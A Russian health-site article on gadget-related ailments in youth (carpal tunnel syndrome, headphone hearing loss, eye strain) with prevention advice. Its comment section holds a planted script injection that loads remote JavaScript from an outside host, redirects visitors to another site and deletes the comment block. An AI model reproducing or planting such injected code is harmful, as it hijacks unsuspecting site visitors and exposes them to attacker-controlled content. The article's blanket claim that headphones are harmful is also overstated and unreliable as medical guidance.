Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Плата за прогресс: новые ...  >>  Плата за прогресс: новые болезни нового поколения
 
Обратная связь
 

Плата за прогресс: новые болезни нового поколения

Размер шрифта
05 марта 2012 10:00
  • google_analytics: false
  • Нравится

Какие болезни вместе с техническим прогрессом приобрело молодое поколение? Что о них нужно знать? Как оградить детей и внуков от ранних проблем со здоровьем?

Плата за пргресс 

Множество электронных приспособлений в обиходе детей и подростков породило целую группу заболеваний. Все эти заболевания могут стать причиной необратимых изменений. Но, поскольку они связаны с образом жизни в юном возрасте, их можно и нужно предупреждать.
 

  1. Туннельный синдром

Распространенная опасность – туннельный синдром, развивается от длительной работы с компьютерной мышью. Но влияет не длительность работы, а неправильная позиция руки – переразогнутая кисть.

Туннельный синдром

С внутренней стороны запястья сухожилия сгибателей пальцев кисти фиксируются широкой поперечной связкой. Под связкой имеются туннели, где проходят нервы и сосуды. При постоянной нагрузке на кисть сосуды пережимаются, нарушается отток венозной крови. Но, самое опасное, происходит сдавление крупного срединного нерва.

Изо дня в день повторяющаяся ситуация приводит к появлению парестезии – ощущений покалывания и онемения в кончиках пальцев. Со временем, появляется боль, а в запущенных случаях – трофические расстройства пальцев.

ВНИМАНИЕ! Онемение в кончиках пальцев – возможный признак туннельного синдрома.

1

Профилактика туннельного синдрома:

  • cократить время работы за компьютером;
  • коврики для мыши с силиконовым валиком под запястье. Валик дает опору, которая предупреждает переразгибание кисти;
  • специальная подставка (на фото) обеспечивает опору для локтя, не ограничивает подвижность руки, и, самое важное, выравнивает кисть.
     
  1. Снижение слуха

Большую проблему представляют собой молодежные плееры с наушниками. И дело даже не в том, что из-за музыки в ушах молодежь подвергается опасности, переходя улицы и не слыша сигналов машин.

1

Наушники в ушах нарушают отделение ушной серы. Ушная сера, которая постоянно вырабатывается во внешнем ухе, скапливается в виде пробок. Серные пробки, помимо неприятных ощущений, приводят к временному нарушению слуха и, даже, к головокружениям.

Но при постоянном использовании наушников развивается гораздо более опасное состояние – стойкое снижение слуха. Ведь максимальная громкость наушников близка к уровню шума взлетающего самолета и отбойного молотка. Доказано, что люди, пользующиеся наушниками больше часа в день, со временем слышат все хуже и хуже. Связано такое снижение слуха с необратимым разрушением слуховых волосков во внутреннем ухе.

ВНИМАНИЕ! Громкий звук портит слух. Наушниками пользоваться вредно.

В качестве профилактики следует ограничить прослушивание музыки в наушниках – не более часа в день (не более 60-70% максимальной громкости).
 

  1. Утомление зрения

Длительная зрительная нагрузка (чтение, работа с компьютером) способна привести к состоянию под названием спазм аккомодации. Это – спазм тех мышц, которые сокращают хрусталик, когда мы переводим взгляд от дальних предметов к близким. Хрусталик – линза, обеспечивающая четкое зрение на любом расстоянии, а круговая мышца хрусталика – настройщик четкости.

1

ВНИМАНИЕ! Постоянная нагрузка зрения вредна.

Проявления спазма аккомодации:

  • усталость;
  • головные боли;
  • снижение зрения.

Профилактика

Упражнение «точка на стекле»: медленно переводим взгляд от точки на оконном стекле вдаль и обратно. В качестве точки на окно можно приклеить метку в виде красного кружка в 1 см. Такая тренировка дает возможность напрягать и расслаблять мышцу, управляющую хрусталиком. Упражнение снимает спазм аккомодации и предупреждает нарушение зрения.

 

Сюжеты по теме:
Бабушкам о внуках. Как уберечь подростков от вредных привычек 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.